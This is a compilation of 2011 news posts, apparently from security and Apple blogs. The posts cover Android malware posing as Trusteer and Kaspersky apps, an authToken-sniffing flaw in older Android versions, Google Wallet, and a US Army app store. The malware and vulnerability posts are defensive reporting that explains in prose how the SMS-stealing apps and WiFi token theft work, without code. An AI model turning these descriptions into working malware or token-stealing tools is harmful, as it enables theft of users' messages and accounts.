Zeus for Android and fake Kaspersky Antivirus 2011

Android shotOver the weekend I wrote about the discovery of the potential Android component of the Zeus information-stealing toolkit (also known as Zitmo).

I wanted to share an update as there are further developments which have been uncovered about the relationship between the Zeus toolkit and Andr/SMSRep-B.

Thanks to Denis from Kaspersky Labs we can now confirm that the fake Trusteer Rapport application is related to malicious websites set up as command-and-control servers for several Zeus/Zbot botnets.

The server-side Zeus application checks for the User-Agent string of the HTTP requests and delivers the malicious payload based on the browser type.

In the case of Android. the default browser User-Agent string will be similar to "Mozilla/5.0 (Linux; U; Android 2.2)..." and from there the operating system can be easily determined.

On a separate note, it seems that the tradition of malware pretending to be legitimate anti-virus software for Android is extending.

After Trusteer, the next target is Kaspersky Labs. Yesterday, I had a chance to analyse a sample of Android malware which attempts to fool the user into installing the package by looking like a legitimate Kaspersky Antivirus 2011 product.

The application package uses an icon similar to the Kaspersky Lab icon, but the actual functionality is far less useful than the functionality of the legitimate product.

When the package is launched the malware attempts to get the unique device id number and transform it into an "activation code". The fake activation code is then displayed in a standard Android view.

Fake Kaspersky Antivirus 2011

In the background, the application installs a broadcast receiver that attempts to intercept SMS messages and send them to a web server set up by the attacker.

Luckily, in the case of this malware (which Sophos detects as Andr/SMSRep-C), the command-and-control web server IP address is 127.0.0.1 (localhost), which does not make the malware very useful.

Clearly, this is just an early test build and we will have to be on watch for the next version which will be connected with a real malicious server.

Although the functionality of Andr/SMSRep-B and Andr/SMSRep-C is quite similar, the code does not indicate that they have been developed by the same author.


What Google and Mastercard’s new mobile payment system could mean for iOS users

Last week saw a major new product announcement from Google: the new "Google Wallet" will allow people with compatible mobile phones to use them to pay for goods and services in shops with a simple wave of their hand. This follows a number of in/out/in/out/shake it all about rumors that this "NFC" stuff might be included in the next iPhone. So what is NFC and why should you care? Sit back, grab a cup of coffee, and I'll explain.

Continue reading What Google and Mastercard's new mobile payment system could mean for iOS users

What Google and Mastercard's new mobile payment system could mean for iOS users originally appeared on TUAW on Mon, 30 May 2011 11:00:00 EST. Please see our terms for use of feeds.

Source | Permalink | Email this | Comments

Security hole could affect 99% of Android smartphones

Android smartphoneAccording to German researchers, 99% of Android devices might be at risk from a vulnerability which could allow unauthorised parties to snoop on your Google Calendar and Contacts information.

The discovery by the University of Ulm researchers brings to light a serious privacy issue, and underlines the difficulty that many Android smartphone owners appear to face keeping their operating systems up-to-date.

According to the paper by Bastian Könings, Jens Nickels, and Florian Schaub, entitled "Catching AuthTokens in the Wild: The Insecurity of Google's ClientLogin Protocol", in Android 2.3.3 and earlier the Calendar and Contacts apps transmit information "in the clear" via HTTP, and retrieve an authentication token (authToken) from Google.

That means that there's the potential for cybercriminals to eavesdrop on WiFi traffic and steal the authToken that your smartphone has just generated.

Wireshark sniffing an authToken

As authTokens can be used for several days for subsequent requests, hackers can exploit them to access what should be private services and data - such as your web-based calendar. Furthermore, it turns out that the generated authTokens are not linked to a particular phone, so they can be easily used to impersonate a handset.

Yuck!

The scenario is a real problem if you use an unencrypted WiFi hotspot (such as those commonly available in hotel lobbies, airports or at the coffee shop on the corner of your street), as someone could snoop on your authToken and abuse it.

According to the researchers, Google has fixed the problem in Android 2.3.4. But there's the rub. Just how many people are still running older versions of the Android OS?

Android OS platform usage

Approximately 99% of Android users are vulnerable, as they haven't updated to at least version 2.3.4 (codenamed "Gingerbread").

GingerbreadUnfortunately it's not always possible to easily upgrade the version of Android running on your phone as you are very dependent on your mobile phone manufacturer and carrier providing the update to you over the air.

There is a huge range of Android smartphones out there, and whereas Apple can issue a single iOS update to patch iPhones and iPads, things aren't so simple for Google's users. This fragmentation inevitably leaves Android devices open to security problems.

Fortunately, Google seems to be aware of this pain, and says it will work more closely with manufacturers and carriers to ensure users can receive the latest Android updates in the future.

But what should you do if you're a concerned Android owner?

My recommendation would be to upgrade to the latest version of Android if at all possible.

Furthermore, do not use open WiFi networks as your communications may not be properly protected. If you're worried about this latest security issue you might be wise to connect to the internet via 3G from their smartphone rather than using unencrypted public WiFi connections.

Using 3G may eat into your data plan, but it's far less likely that your communications are being snooped upon.

Update: Good news. Google has started rolling-out a fix for this vulnerability.


US Army to launch its own app store

Wired got an early look at an app marketplace designed by the Army for the Army. It will be populated with titles specific to Army operations and will support both desktop computers and mobile devices. The Army Marketplace will launch with 16 iPhone apps and 17 Android apps, most of which were designed as part of the Apps for Army contest. These apps will be available for a nominal fee to Army employees.

The marketplace will let soldiers submit ideas for new apps, which can be discussed by fellow soldiers and developed in-house if possible. Apps that require outside help will be put out to bid and developed by a third-party contractor. Unfortunately, the store is limited to Department of Defense employees only and requires a secure login to gain access to the Marketplace website.

This need for tight security poses a problem as the Army does not have a solution in place for authenticating applications on a mobile device. Right now, the Army Marketplace is useful for designing cool apps, but they cannot be downloaded to Army handsets.

Last week, the Army took steps towards securing a mobile platform by confirming it is testing Android as the OS to power its first smartphone prototype. This military branch may be examining this iOS competitor closely, but it has not chosen Google's mobile OS as its final solution.

In fact, no Android handset has started the certification process overseen by the National Institute of Standards and Technology. A phone has to be approved by this board before it can be considered secure enough to contain government data. The iPhone has entered this process, but it is still months away from approval.

US Army to launch its own app store originally appeared on TUAW on Wed, 27 Apr 2011 18:00:00 EST. Please see our terms for use of feeds.

Source | Permalink | Email this | Comments